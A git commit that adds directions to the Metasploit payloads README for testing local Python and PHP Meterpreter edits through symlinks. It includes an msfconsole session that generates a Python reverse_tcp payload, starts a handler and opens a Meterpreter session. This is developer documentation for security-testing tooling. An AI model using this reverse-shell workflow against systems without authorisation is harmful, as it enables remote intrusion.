Update README.md to include Python and PHP testing directions

2025-01-02 11:36:22 +01:00 · 2022-12-13 12:50:47 -06:00 · 2022-12-13 12:50:47 -06:00 · 606b8a232e
commit 606b8a232e
parent 6ec0b8a655
1 changed files with 30 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -16,6 +16,36 @@ See the individual directories for meterpreter-specific README, build instructio
 * [C Windows/Linux Meterpreters][creadme]
 * [Java/Android Meterpreters and Payloads][javareadme]

+For Python and PHP Meterpreter, you can test changes to these files by symlinking the associated files to `~/.msf4/payloads/meterpreter`.
+As an example, here is how this might look like for a Python Meterpreter edit:
+
+```bash
+mkdir ~/.msf4/payloads # If this doesn't exist already
+cd ~/git/metasploit-payloads
+ln -s /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py
+file ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
+       /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py: symbolic link to /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py
+```
+
+If things went right you should see a warning message when selecting one of the corresponding Meterpreter payloads and recieving a session:
+
+```
+msf6 > use payload/python/meterpreter/reverse_tcp
+msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
+LHOST => 192.168.153.128
+msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
+[*] Writing 436 bytes to reverse.py...
+msf6 payload(python/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 192.168.153.128:4444 
+msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/meterpreter.py is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+[*] Sending stage (24380 bytes) to 192.168.153.1
+WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
+[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600
+```
+
  [csource]: https://github.com/rapid7/meterpreter
  [creadme]: https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter
  [javasource]: https://github.com/rapid7/metasploit-javapayload